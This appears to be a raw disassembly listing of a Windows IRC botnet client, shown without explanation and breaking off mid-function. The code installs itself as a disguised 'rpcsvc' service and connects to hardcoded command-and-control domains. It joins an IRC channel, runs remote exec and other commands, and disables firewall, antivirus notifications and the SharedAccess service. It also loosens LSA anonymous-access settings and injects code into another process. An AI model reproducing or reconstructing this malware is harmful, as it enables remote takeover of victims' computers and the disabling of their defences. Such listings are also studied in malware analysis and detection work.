push edi
xor esi, esi
push 12h
push esi
push esi
call dword_401004 ; OpenSCManagerA
mov edi, offset aRpcsvc ; "rpcsvc"
mov ebx, eax
push 10h
push edi
push ebx
call dword_40103C ; OpenServiceA
cmp eax, esi
mov [ebp+var_4], eax
jnz short loc_40223E
push esi
push esi
push esi
push esi
push esi
push offset aCWindowsSystem ; "C:\\WINDOWS\\System32\\rpcsvc.exe"
push esi
push 2
push 110h
push 40012h
push offset aWindowsRemoteP ; "Windows Remote Procedure Call Monitorin"...
push edi
push ebx
call dword_401020 ; CreateServiceA
mov edi, dword_401034
lea ecx, [ebp+var_10]
push 1
mov [ebp+var_14], ecx
pop ebx
lea ecx, [ebp+var_24]
push ecx
push 2
push eax
mov [ebp+var_4], eax
mov [ebp+var_10], ebx
mov [ebp+var_C], esi
mov [ebp+var_24], esi
mov [ebp+var_20], esi
mov [ebp+var_1C], esi
mov [ebp+var_18], ebx
call edi ; ChangeServiceConfig2A
push 100h
lea eax, [ebp+var_124]
push offset aProvidesReliab ; "Provides reliability and uptime monitor"...
push eax
call dword_4010BC ; lstrcpyn
lea eax, [ebp+var_124]
mov [ebp+var_8], eax
lea eax, [ebp+var_8]
push eax
push ebx
push [ebp+var_4]
call edi ; ChangeServiceConfig2A
loc_40223E: ; CODE XREF: sub_402193+2E�j
push esi
push esi
push [ebp+var_4]
call dword_401038 ; StartServiceA
pop edi
pop esi
pop ebx
leave
retn
sub_402193 endp
; =============== S U B R O U T I N E =======================================
sub_40224E proc near ; CODE XREF: sub_4027CB+F1�p
; sub_40384E+102�p
push esi
mov esi, 10000h
push edi
push esi
push 0
push 0
call dword_401004 ; OpenSCManagerA
mov edi, eax
push esi
push offset aRpcsvc ; "rpcsvc"
push edi
call dword_40103C ; OpenServiceA
mov esi, eax
push esi
call dword_40100C ; DeleteService
push esi
mov esi, dword_401008
call esi ; CloseServiceHandle
push edi
call esi ; CloseServiceHandle
call sub_402CD9
pop edi
pop esi
retn
sub_40224E endp
; =============== S U B R O U T I N E =======================================
sub_40228C proc near ; CODE XREF: sub_402094+1C�p
push 104h
push offset aCM_unpackerPac ; "C:\\m_unpacker\\packed.exe"
push 0
call dword_4010B8 ; GetModuleFileNameA
and byte ptr aCM_unpackerPac[eax], 0 ; "C:\\m_unpacker\\packed.exe"
push 44h
push offset aD ; "D"
call sub_402DBC
and word_401630, 0
mov dword ptr aD, 44h ; "D"
mov dword_40162C, 81h
retn
sub_40228C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4022CE proc near ; DATA XREF: sub_402094+E�o
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
push ebp
mov ebp, esp
sub esp, 1Ch
push offset nullsub_2
push offset aRpcsvc ; "rpcsvc"
call dword_401014 ; RegisterServiceCtrlHandlerA
and [ebp+var_14], 0
lea ecx, [ebp+var_1C]
push ecx
push eax
mov [ebp+var_1C], 10h
mov [ebp+var_18], 4
call dword_401010 ; SetServiceStatus
call sub_4020D7
leave
retn 8
sub_4022CE endp
; [00000003 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40230D proc near ; CODE XREF: sub_4020D7:loc_402112�p
var_52C = byte ptr -52Ch
var_12C = dword ptr -12Ch
var_128 = dword ptr -128h
var_28 = word ptr -28h
var_26 = word ptr -26h
var_24 = dword ptr -24h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 52Ch
call sub_402E88
mov eax, offset aBbjj_househot_ ; "bbjj.househot.com"
cmp dword_401280, eax
jnz short loc_40233A
mov ax, word_401CAE
mov dword_401280, offset aYpgw_wallloan_ ; "ypgw.wallloan.com"
jmp short loc_402345
; ---------------------------------------------------------------------------
loc_40233A: ; CODE XREF: sub_40230D+19�j
mov dword_401280, eax
mov ax, word_401C9A
loc_402345: ; CODE XREF: sub_40230D+2B�j
push ebx
mov word_401288, ax
push dword_401280
call dword_401124 ; gethostbyname
xor ebx, ebx
cmp eax, ebx
jz loc_40254A
mov dword_40128C, ebx
mov dword_401284, ebx
mov eax, [eax+0Ch]
push esi
push edi
push 6
mov eax, [eax]
push 1
pop esi
mov eax, [eax]
push esi
mov [ebp+var_24], eax
mov ax, word_401288
push 2
mov [ebp+var_28], 2
mov [ebp+var_26], ax
call dword_401128 ; socket
lea ecx, [ebp+var_10]
push 4
push ecx
push 8
push 0FFFFh
push eax
mov dword_4014BC, eax
mov [ebp+var_10], esi
call dword_40116C ; setsockopt
lea eax, [ebp+var_28]
push 10h
push eax
push dword_4014BC
call dword_401130 ; connect
mov esi, dword_401134
push ebx
push 0Dh
push offset dword_401688
push dword_4014BC
call esi ; send
call dword_4010B4 ; GetTickCount
mov edi, dword_401110
push eax
push offset dword_401CC4
push offset dword_40167C
push offset dword_401490
call edi ; wsprintfA
push offset dword_401490
push offset dword_401670
push offset dword_401290
call edi ; wsprintfA
add esp, 1Ch
mov dword_40127C, eax
push ebx
push eax
push offset dword_401290
push dword_4014BC
call esi ; send
lea eax, [ebp+var_4]
mov [ebp+var_4], 10h
push eax
lea eax, [ebp+var_28]
push eax
push dword_4014BC
call dword_401138 ; getsockname
mov eax, [ebp+var_24]
push 1
mov dword_4014C4, eax
mov eax, dword_4014BC
mov [ebp+var_128], eax
mov eax, dword_401CC0
mov esi, dword_40113C
mov [ebp+var_18], eax
pop edi
lea eax, [ebp+var_18]
push eax
push ebx
lea eax, [ebp+var_12C]
push ebx
push eax
mov [ebp+var_4], ebx
mov [ebp+var_12C], edi
mov [ebp+var_14], ebx
push ebx
loc_40247B: ; CODE XREF: sub_40230D+208�j
call esi ; select
cmp eax, edi
jnz loc_40253C
mov eax, [ebp+var_4]
mov ecx, 400h
sub ecx, eax
push ebx
lea eax, [ebp+eax+var_52C]
push ecx
push eax
push dword_4014BC
call dword_401140 ; recv
cmp eax, ebx
jle loc_40253C
add [ebp+var_4], eax
mov eax, [ebp+var_4]
mov [ebp+eax+var_52C], bl
cmp [ebp+var_52C], bl
lea eax, [ebp+var_52C]
mov [ebp+var_8], eax
jz short loc_4024F3
loc_4024CB: ; CODE XREF: sub_40230D+1E4�j
push 0Dh
push [ebp+var_8]
call sub_402E2E
cmp eax, ebx
mov [ebp+var_C], eax
jz short loc_40251A
push [ebp+var_8]
mov [eax], bl
call sub_40258D
mov eax, [ebp+var_C]
add eax, 2
mov [ebp+var_8], eax
cmp [eax], bl
jnz short loc_4024CB
loc_4024F3: ; CODE XREF: sub_40230D+1BC�j
mov [ebp+var_4], ebx
loc_4024F6: ; CODE XREF: sub_40230D+22D�j
mov eax, dword_4014BC
mov [ebp+var_12C], edi
mov [ebp+var_128], eax
lea eax, [ebp+var_18]
push eax
push ebx
lea eax, [ebp+var_12C]
push ebx
push eax
push ebx
jmp loc_40247B
; ---------------------------------------------------------------------------
loc_40251A: ; CODE XREF: sub_40230D+1CD�j
lea eax, [ebp+var_52C]
sub eax, [ebp+var_8]
add [ebp+var_4], eax
mov eax, [ebp+var_4]
inc eax
push eax
lea eax, [ebp+var_52C]
push [ebp+var_8]
push eax
call sub_402E0E
jmp short loc_4024F6
; ---------------------------------------------------------------------------
loc_40253C: ; CODE XREF: sub_40230D+172�j
; sub_40230D+19A�j
push dword_4014BC
call dword_401144 ; closesocket
pop edi
pop esi
loc_40254A: ; CODE XREF: sub_40230D+4F�j
pop ebx
leave
retn
sub_40230D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40254D proc near ; CODE XREF: sub_4027CB:loc_402848�p
; sub_4027CB+2AC�p ...
var_200 = byte ptr -200h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 200h
push [ebp+arg_0]
lea eax, [ebp+var_200]
push offset dword_401CB0
push offset aPrivmsg_16s_48 ; "PRiVMSG %.16s :%.480s\n"
push eax
call dword_401110 ; wsprintfA
add esp, 10h
push 0
push eax
lea eax, [ebp+var_200]
push eax
push dword_4014BC
call dword_401134 ; send
leave
retn 4
sub_40254D endp
; =============== S U B R O U T I N E =======================================
sub_40258D proc near ; CODE XREF: sub_40230D+1D4�p
arg_0 = dword ptr 4
push ebx
push ebp
push esi
mov esi, [esp+0Ch+arg_0]
push edi
cmp byte ptr [esi], 3Ah
jnz short loc_4025B5
lea ebx, [esi+1]
push 20h
push ebx
call sub_402E2E
mov esi, eax
test esi, esi
jz loc_4027C4
and byte ptr [esi], 0
inc esi
jmp short loc_4025B7
; ---------------------------------------------------------------------------
loc_4025B5: ; CODE XREF: sub_40258D+B�j
xor ebx, ebx
loc_4025B7: ; CODE XREF: sub_40258D+26�j
push 20h
push esi
call sub_402E2E
mov edi, eax
test edi, edi
jz loc_4027C4
and byte ptr [edi], 0
mov ebp, dword_4010B0
push offset aPing ; "PING"
push esi
inc edi
call ebp ; lstrcmp
test eax, eax
jnz short loc_40260E
push edi
mov esi, offset dword_401290
push offset aPong_500s ; "PoNG %.500s\r\n"
push esi
call dword_401110 ; wsprintfA
add esp, 0Ch
loc_4025F4: ; CODE XREF: sub_40258D+F5�j
push 0
push eax
push esi
mov dword_40127C, eax
push dword_4014BC
call dword_401134 ; send
jmp loc_4027C4
; ---------------------------------------------------------------------------
loc_40260E: ; CODE XREF: sub_40258D+50�j
push offset aPrivmsg ; "PRIVMSG"
push esi
call ebp ; lstrcmp
test eax, eax
jnz short loc_40263A
test ebx, ebx
jz loc_4027C4
push ebx
push offset dword_401CCC
call sub_403185
test eax, eax
jz loc_4027C4
push 20h
push edi
jmp short loc_4026A7
; ---------------------------------------------------------------------------
loc_40263A: ; CODE XREF: sub_40258D+8B�j
push offset a433 ; "433"
push esi
call ebp ; lstrcmp
test eax, eax
jnz short loc_402687
cmp dword_40128C, eax
jnz loc_4027C4
call dword_4010B4 ; GetTickCount
mov edi, dword_401110
push eax
push offset dword_401CC4
mov esi, offset dword_401490
push offset dword_40167C
push esi
call edi ; wsprintfA
push esi
mov esi, offset dword_401290
push offset dword_401670
push esi
call edi ; wsprintfA
add esp, 1Ch
jmp loc_4025F4
; ---------------------------------------------------------------------------
loc_402687: ; CODE XREF: sub_40258D+B7�j
push offset a332 ; "332"
push esi
call ebp ; lstrcmp
test eax, eax
jnz short loc_4026E3
push 20h
push edi
call sub_402E2E
test eax, eax
jz loc_4027C4
inc eax
push 20h
push eax
loc_4026A7: ; CODE XREF: sub_40258D+AB�j
call sub_402E2E
test eax, eax
jz loc_4027C4
inc eax
cmp byte ptr [eax], 3Ah
jnz short loc_4026BB
inc eax
loc_4026BB: ; CODE XREF: sub_40258D+12B�j
mov cl, [eax]
cmp cl, byte_401CC8
jnz short loc_4026D3
push 0
loc_4026C7: ; CODE XREF: sub_40258D+154�j
inc eax
push eax
call sub_4027CB
jmp loc_4027C4
; ---------------------------------------------------------------------------
loc_4026D3: ; CODE XREF: sub_40258D+136�j
cmp cl, byte_401CC9
jnz loc_4027C4
push 1
jmp short loc_4026C7
; ---------------------------------------------------------------------------
loc_4026E3: ; CODE XREF: sub_40258D+104�j
push offset a302 ; "302"
push esi
call ebp ; lstrcmp
test eax, eax
jnz short loc_40274E
cmp dword_401284, eax
jnz short loc_40274E
push 40h
push edi
call sub_402E2E
mov esi, eax
test esi, esi
jz short loc_402747
inc esi
push 20h
push esi
call sub_402E2E
test eax, eax
jz short loc_402715
and byte ptr [eax], 0
loc_402715: ; CODE XREF: sub_40258D+183�j
push esi
call dword_401120 ; inet_addr
cmp eax, 0FFFFFFFFh
mov dword_4014C0, eax
jnz short loc_40273D
push esi
call dword_401124 ; gethostbyname
test eax, eax
jz short loc_402747
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
mov dword_4014C0, eax
loc_40273D: ; CODE XREF: sub_40258D+197�j
mov dword_401284, 1
loc_402747: ; CODE XREF: sub_40258D+176�j
; sub_40258D+1A2�j
call sub_402EAA
jmp short loc_4027C4
; ---------------------------------------------------------------------------
loc_40274E: ; CODE XREF: sub_40258D+160�j
; sub_40258D+168�j
push offset a001 ; "001"
push esi
call ebp ; lstrcmp
test eax, eax
jnz short loc_4027C4
xor ebx, ebx
cmp dword_40128C, ebx
jnz short loc_4027C4
mov edi, dword_401110
push offset dword_401490
mov esi, offset dword_401290
push offset aUserhost_16s ; "USeRHOST %.16s\n"
push esi
mov dword_40128C, 1
call edi ; wsprintfA
add esp, 0Ch
mov ebp, dword_401134
mov dword_40127C, eax
push ebx
push eax
push esi
push dword_4014BC
call ebp ; send
push offset aIhodc9hi ; "ihodc9hi"
push offset dword_401CB0
push offset aJoin_16s_16s ; "JOiN %.16s %.16s\n"
push esi
call edi ; wsprintfA
add esp, 10h
mov dword_40127C, eax
push ebx
push eax
push esi
push dword_4014BC
call ebp ; send
loc_4027C4: ; CODE XREF: sub_40258D+1C�j
; sub_40258D+36�j ...
pop edi
pop esi
pop ebp
pop ebx
retn 4
sub_40258D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4027CB proc near ; CODE XREF: sub_40258D+13C�p
; sub_4027CB+141�p
var_410 = byte ptr -410h
var_10 = byte ptr -10h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 410h
mov eax, [ebp+arg_0]
push esi
mov dl, [eax]
movsx ecx, dl
cmp ecx, 61h
jg loc_402938
jz loc_402920
cmp ecx, 49h
jg loc_402879
jz short loc_402861
sub ecx, 43h
jz short loc_402857
dec ecx
jz short loc_40284D
dec ecx
jz short loc_402813
dec ecx
jnz loc_402A7C
call sub_403D9E
jmp loc_402A7C
; ---------------------------------------------------------------------------
loc_402813: ; CODE XREF: sub_4027CB+35�j
cmp byte ptr [eax+1], 20h
jnz short loc_40284D
push offset dword_401650
xor edx, edx
push offset aD ; "D"
push edx
push edx
push 28h
push edx
push edx
add eax, 2
push edx
push eax
push edx
call dword_4010AC ; CreateProcessA
cmp eax, 1
jnz short loc_402843
push offset aExec_0 ; "[exec] :)"
jmp short loc_402848
; ---------------------------------------------------------------------------
loc_402843: ; CODE XREF: sub_4027CB+6F�j
push offset aExec ; "[exec] :("
loc_402848: ; CODE XREF: sub_4027CB+76�j
call sub_40254D
loc_40284D: ; CODE XREF: sub_4027CB+32�j
; sub_4027CB+4C�j
call sub_402E88
jmp loc_402A7C
; ---------------------------------------------------------------------------
loc_402857: ; CODE XREF: sub_4027CB+2F�j
call sub_403A2B
jmp loc_402A7C
; ---------------------------------------------------------------------------
loc_402861: ; CODE XREF: sub_4027CB+2A�j
cmp byte ptr [eax+1], 20h
jnz loc_402A7C
add eax, 2
push eax
call sub_403A36
jmp loc_402A7C
; ---------------------------------------------------------------------------
loc_402879: ; CODE XREF: sub_4027CB+24�j
sub ecx, 4Ch
jz loc_402916
sub ecx, 5
jz short loc_4028C6
dec ecx
jz short loc_40289B
dec ecx
jnz loc_402A7C
call sub_4034B6
jmp loc_402A7C
; ---------------------------------------------------------------------------
loc_40289B: ; CODE XREF: sub_4027CB+BD�j
push 0
push 5
push offset aQuit ; "QUiT\n"
push dword_4014BC
call dword_401134 ; send
push dword_4014BC
call dword_401144 ; closesocket
call sub_40224E
jmp loc_402A7C
; ---------------------------------------------------------------------------
loc_4028C6: ; CODE XREF: sub_4027CB+BA�j
cmp byte ptr [eax+1], 20h
jnz loc_402A7C
mov cl, [eax+2]
add eax, 2
xor edx, edx
xor esi, esi
cmp cl, dl
jz short loc_4028FB
push ebx
loc_4028DF: ; CODE XREF: sub_4027CB+12D�j
mov bl, [eax+1]
shl cl, 4
add bl, cl
sub bl, 71h
mov [ebp+esi+var_410], bl
inc esi
inc eax
inc eax
mov cl, [eax]
cmp cl, dl
jnz short loc_4028DF
pop ebx
loc_4028FB: ; CODE XREF: sub_4027CB+111�j
push [ebp+arg_4]
lea eax, [ebp+var_410]
mov [ebp+esi+var_410], dl
push eax
call sub_4027CB
jmp loc_402A7C
; ---------------------------------------------------------------------------
loc_402916: ; CODE XREF: sub_4027CB+B1�j
call sub_402EFD
jmp loc_402A7C
; ---------------------------------------------------------------------------
loc_402920: ; CODE XREF: sub_4027CB+1B�j
cmp byte ptr [eax+1], 20h
jnz loc_402A7C
add eax, 2
push eax
call sub_40421C
jmp loc_402A7C
; ---------------------------------------------------------------------------
loc_402938: ; CODE XREF: sub_4027CB+15�j
cmp ecx, 6Ch
jg loc_4029E2
jz loc_4029D8
sub ecx, 63h
jz short loc_4029C0
dec ecx
dec ecx
jz loc_4029F8
dec ecx
jz short loc_4029B6
dec ecx
dec ecx
jz short loc_40299E
dec ecx
jnz loc_402A7C
cmp byte ptr [eax+1], 20h
jnz loc_402A7C
add eax, 2
mov esi, offset dword_401290
push eax
push offset a_500s ; "%.500s\n"
push esi
call dword_401110 ; wsprintfA
add esp, 0Ch
mov dword_40127C, eax
push 0
push eax
push esi
push dword_4014BC
call dword_401134 ; send
jmp loc_402A7C
; ---------------------------------------------------------------------------
loc_40299E: ; CODE XREF: sub_4027CB+18E�j
cmp byte ptr [eax+1], 20h
jnz loc_402A7C
add eax, 2
push eax
call sub_404086
jmp loc_402A7C
; ---------------------------------------------------------------------------
loc_4029B6: ; CODE XREF: sub_4027CB+18A�j
call sub_403D7D
jmp loc_402A7C
; ---------------------------------------------------------------------------
loc_4029C0: ; CODE XREF: sub_4027CB+17F�j
cmp byte ptr [eax+1], 20h
jnz loc_402A7C
add eax, 2
push eax
call sub_40399D
jmp loc_402A7C
; ---------------------------------------------------------------------------
loc_4029D8: ; CODE XREF: sub_4027CB+176�j
call sub_402EAA
jmp loc_402A7C
; ---------------------------------------------------------------------------
loc_4029E2: ; CODE XREF: sub_4027CB+170�j
sub ecx, 6Eh
jz short loc_402A3A
sub ecx, 3
jz short loc_402A29
dec ecx
dec ecx
jz short loc_402A15
dec ecx
dec ecx
jnz loc_402A7C
loc_4029F8: ; CODE XREF: sub_4027CB+183�j
cmp byte ptr [eax+1], 20h
jnz short loc_402A7C
push [ebp+arg_4]
xor ecx, ecx
cmp dl, 75h
setz cl
add eax, 2
push ecx
push eax
call sub_4037CC
jmp short loc_402A7C
; ---------------------------------------------------------------------------
loc_402A15: ; CODE XREF: sub_4027CB+223�j
cmp byte ptr [eax+1], 20h
jnz short loc_402A7C
push [ebp+arg_4]
add eax, 2
push eax
call sub_4033F9
jmp short loc_402A7C
; ---------------------------------------------------------------------------
loc_402A29: ; CODE XREF: sub_4027CB+21F�j
cmp byte ptr [eax+1], 20h
jnz short loc_402A7C
add eax, 2
push eax
call sub_403207
jmp short loc_402A7C
; ---------------------------------------------------------------------------
loc_402A3A: ; CODE XREF: sub_4027CB+21A�j
mov esi, dword_40111C
push 10h
push dword_4014C4
call esi ; inet_ntoa
push eax
lea eax, [ebp+var_10]
push eax
call dword_4010BC ; lstrcpyn
push dword_4014C0
call esi ; inet_ntoa
push eax
lea eax, [ebp+var_10]
push eax
mov esi, offset dword_401290
push offset aNi_16s_16s ; "[ni] %.16s %.16s"
push esi
call dword_401110 ; wsprintfA
add esp, 10h
push esi
call sub_40254D
loc_402A7C: ; CODE XREF: sub_4027CB+38�j
; sub_4027CB+43�j ...
pop esi
leave
retn 8
sub_4027CB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402A81 proc near ; CODE XREF: sub_4020D7+26�p
var_134 = byte ptr -134h
var_30 = byte ptr -30h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_12 = word ptr -12h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 134h
push ebx
push esi
push edi
push 1
pop esi
xor ebx, ebx
lea eax, [ebp+var_14]
push ebx
push eax
push ebx
push ebx
push 4
push 6
mov [ebp+var_8], esi
mov [ebp+var_C], ebx
mov [ebp+var_14], 2
mov [ebp+var_13], bl
mov [ebp+var_12], 8
mov [ebp+var_10], bx
mov [ebp+var_E], bx
call dword_40109C ; GetCurrentProcess
push eax
call dword_401030 ; SetSecurityInfo
mov edi, dword_40102C
lea eax, [ebp+var_4]
push eax
push offset aSoftwareMicros ; "software\\microsoft\\ole"
push 80000002h
call edi ; RegCreateKeyA
push 2
push offset aN ; "n"
push esi
mov esi, dword_401028
push ebx
push offset aEnabledcom ; "enabledcom"
push [ebp+var_4]
call esi ; RegSetValueExA
push [ebp+var_4]
call dword_401024 ; RegCloseKey
lea eax, [ebp+var_4]
push eax
push offset aSystemCurrentc ; "system\\currentcontrolset\\control\\lsa"
push 80000002h
call edi ; RegCreateKeyA
lea eax, [ebp+var_8]
push 4
push eax
push 4
push ebx
push offset aRestrictanonym ; "restrictanonymous"
push [ebp+var_4]
call esi ; RegSetValueExA
lea eax, [ebp+var_8]
push 4
push eax
push 4
push ebx
push offset aRestrictanon_0 ; "restrictanonymoussam"
push [ebp+var_4]
call esi ; RegSetValueExA
push [ebp+var_4]
call dword_401024 ; RegCloseKey
lea eax, [ebp+var_4]
push eax
push offset aSystemCurren_0 ; "system\\currentcontrolset\\services\\lanma"...
push 80000002h
call edi ; RegCreateKeyA
lea eax, [ebp+var_C]
push 4
push eax
push 4
push ebx
push offset aAutoshareserve ; "autoshareserver"
push [ebp+var_4]
call esi ; RegSetValueExA
lea eax, [ebp+var_C]
push 4
push eax
push 4
push ebx
push offset aAutosharewks ; "autosharewks"
push [ebp+var_4]
call esi ; RegSetValueExA
push [ebp+var_4]
call dword_401024 ; RegCloseKey
lea eax, [ebp+var_4]
push eax
push offset aSoftwareMicr_0 ; "software\\microsoft\\security center"
push 80000002h
call edi ; RegCreateKeyA
lea eax, [ebp+var_8]
push 4
push eax
push 4
push ebx
push offset aAntivirusdisab ; "antivirusdisablenotify"
push [ebp+var_4]
call esi ; RegSetValueExA
lea eax, [ebp+var_8]
push 4
push eax
push 4
push ebx
push offset aAntivirusoverr ; "antivirusoverride"
push [ebp+var_4]
call esi ; RegSetValueExA
lea eax, [ebp+var_8]
push 4
push eax
push 4
push ebx
push offset aFirewalldisabl ; "firewalldisablenotify"
push [ebp+var_4]
call esi ; RegSetValueExA
lea eax, [ebp+var_8]
push 4
push eax
push 4
push ebx
push offset aFirewalldisa_0 ; "firewalldisableoverride"
push [ebp+var_4]
call esi ; RegSetValueExA
push [ebp+var_4]
call dword_401024 ; RegCloseKey
lea eax, [ebp+var_4]
push eax
push offset aSoftwarePolici ; "software\\policies\\microsoft\\windowsfire"...
push 80000002h
call edi ; RegCreateKeyA
lea eax, [ebp+var_C]
push 4
push eax
push 4
push ebx
push offset aEnablefirewall ; "enablefirewall"
push [ebp+var_4]
call esi ; RegSetValueExA
push [ebp+var_4]
call dword_401024 ; RegCloseKey
lea eax, [ebp+var_4]
push eax
push offset aSoftwarePoli_0 ; "software\\policies\\microsoft\\windowsfire"...
push 80000002h
call edi ; RegCreateKeyA
lea eax, [ebp+var_C]
push 4
push eax
push 4
push ebx
push offset aEnablefirewall ; "enablefirewall"
push [ebp+var_4]
call esi ; RegSetValueExA
push [ebp+var_4]
call dword_401024 ; RegCloseKey
lea eax, [ebp+var_134]
push 104h
push eax
call dword_4010A0 ; GetWindowsDirectoryA
lea eax, [ebp+var_134]
push eax
push offset aSDebugDcpromo_ ; "%s\\debug\\dcpromo.log"
lea eax, [ebp+var_134]
push eax
call dword_401110 ; wsprintfA
add esp, 0Ch
lea eax, [ebp+var_134]
push 1
push eax
call dword_4010A4 ; _lcreat
push eax
call dword_4010A8 ; _lclose
lea eax, [ebp+var_134]
push 1
push eax
call dword_4010C4 ; SetFileAttributesA
push 22h
push ebx
push ebx
call dword_401004 ; OpenSCManagerA
mov edi, eax
push 22h
push offset aSharedaccess ; "sharedaccess"
push edi
call dword_40103C ; OpenServiceA
mov esi, eax
lea eax, [ebp+var_30]
push eax
push 1
push esi
call dword_40101C ; ControlService
push ebx
push ebx
push ebx
push ebx
push ebx
push ebx
push ebx
push 0FFFFFFFFh
push 4
push 0FFFFFFFFh
push esi
call dword_401018 ; ChangeServiceConfigA
push esi
mov esi, dword_401008
call esi ; CloseServiceHandle
push edi
call esi ; CloseServiceHandle
pop edi
pop esi
pop ebx
leave
retn
sub_402A81 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402CD9 proc near ; CODE XREF: sub_40212C+61�j
; sub_40224E+36�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
call dword_40109C ; GetCurrentProcess
mov edi, dword_4010DC
push offset dword_401650
xor esi, esi
mov ebx, eax
mov eax, dword_401058
push offset aD ; "D"
push esi
push esi
mov dword_401955, eax
mov eax, dword_401054
push 44h
push esi
push esi
mov dword_401961, eax
mov eax, dword_401050
push esi
push offset dword_401980
push esi
mov dword_401968, eax
mov dword_401971, edi
call dword_4010AC ; CreateProcessA
push 2
push esi
lea eax, [ebp+var_8]
push esi
push eax
push dword_401650
push ebx
push ebx
call dword_40104C ; DuplicateHandle
mov eax, [ebp+var_8]
push 4
push 1000h
push 138h
push esi
mov dword_401950, eax
push dword_401650
mov dword_40195C, eax
call dword_401048 ; VirtualAllocEx
mov ebx, dword_401044
push esi
push 34h
push offset loc_401948
push eax
mov [ebp+var_4], eax
push dword_401650
call ebx ; WriteProcessMemory
mov eax, [ebp+var_4]
push esi
push 104h
add eax, 34h
push offset aCM_unpackerPac ; "C:\\m_unpacker\\packed.exe"
push eax
push dword_401650
call ebx ; WriteProcessMemory
push esi
push esi
push esi
push [ebp+var_4]
push esi
push esi
push dword_401650
call dword_401070 ; CreateRemoteThread
push esi
call edi ; ExitProcess
pop edi
pop esi
pop ebx
sub_402CD9 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_402DBC proc near ; CODE XREF: sub_40228C+20�p
; sub_4040DE+DC�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
test ecx, ecx
jbe short locret_402DDA
mov edx, ecx
push edi
mov edi, [esp+4+arg_0]
xor eax, eax
shr ecx, 2
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
pop edi
locret_402DDA: ; CODE XREF: sub_402DBC+6�j
retn 8
sub_402DBC endp
; =============== S U B R O U T I N E =======================================
sub_402DDD proc near ; CODE XREF: sub_40443A+F0�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
mov ecx, [esp+arg_4]
test ecx, ecx
jbe short locret_402E0B
mov al, [esp+arg_8]
push ebx
mov bl, al
mov edx, ecx
mov bh, bl
push edi
mov edi, [esp+8+arg_0]
mov eax, ebx
shl eax, 10h
mov ax, bx
shr ecx, 2
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
pop edi
pop ebx
locret_402E0B: ; CODE XREF: sub_402DDD+6�j
retn 0Ch
sub_402DDD endp
; =============== S U B R O U T I N E =======================================
sub_402E0E proc near ; CODE XREF: sub_40230D+228�p
; sub_40325F+1A�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_8]
test esi, esi
jbe short loc_402E2A
mov ecx, [esp+4+arg_0]
mov eax, [esp+4+arg_4]
sub eax, ecx
loc_402E21: ; CODE XREF: sub_402E0E+1A�j
mov dl, [eax+ecx]
mov [ecx], dl
inc ecx
dec esi
jnz short loc_402E21
loc_402E2A: ; CODE XREF: sub_402E0E+7�j
pop esi
retn 0Ch
sub_402E0E endp
; =============== S U B R O U T I N E =======================================
sub_402E2E proc near ; CODE XREF: sub_40230D+1C3�p
; sub_40258D+13�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
mov eax, [esp+arg_0]
loc_402E32: ; CODE XREF: sub_402E2E+11�j
mov cl, [eax]
test cl, cl
jz short loc_402E41
cmp cl, [esp+arg_4]
jz short locret_402E43
inc eax
jmp short loc_402E32
; ---------------------------------------------------------------------------
loc_402E41: ; CODE XREF: sub_402E2E+8�j
xor eax, eax
locret_402E43: ; CODE XREF: sub_402E2E+E�j
retn 8
sub_402E2E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402E46 proc near ; CODE XREF: sub_403DA9+1B8�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
push ebx
push esi
mov esi, [ebp+arg_4]
push edi
mov edx, esi
mov cl, [esi]
test cl, cl
mov byte ptr [ebp+arg_0+3], cl
jz short loc_402E81
loc_402E5D: ; CODE XREF: sub_402E46+37�j
mov cl, [eax]
test cl, cl
jz short loc_402E7F
cmp cl, byte ptr [ebp+arg_0+3]
jnz short loc_402E7C
mov edi, eax
sub edi, esi
loc_402E6C: ; CODE XREF: sub_402E46+32�j
mov cl, [edx]
test cl, cl
jz short loc_402E81
mov bl, [edi+edx]
inc edx
cmp bl, cl
jz short loc_402E6C
mov edx, esi
loc_402E7C: ; CODE XREF: sub_402E46+20�j
inc eax
jmp short loc_402E5D
; ---------------------------------------------------------------------------
loc_402E7F: ; CODE XREF: sub_402E46+1B�j
xor eax, eax
loc_402E81: ; CODE XREF: sub_402E46+15�j
; sub_402E46+2A�j
pop edi
pop esi
pop ebx
pop ebp
retn 8
sub_402E46 endp
; =============== S U B R O U T I N E =======================================
sub_402E88 proc near ; CODE XREF: sub_40230D+9�p
; sub_4027CB:loc_40284D�p
push offset aDnsapi_dll ; "dnsapi.dll"
call dword_401060 ; LoadLibraryA
test eax, eax
jz short locret_402EA9
push offset aDnsflushresolv ; "DnsFlushResolverCache"
push eax
call dword_40105C ; GetProcAddress
test eax, eax
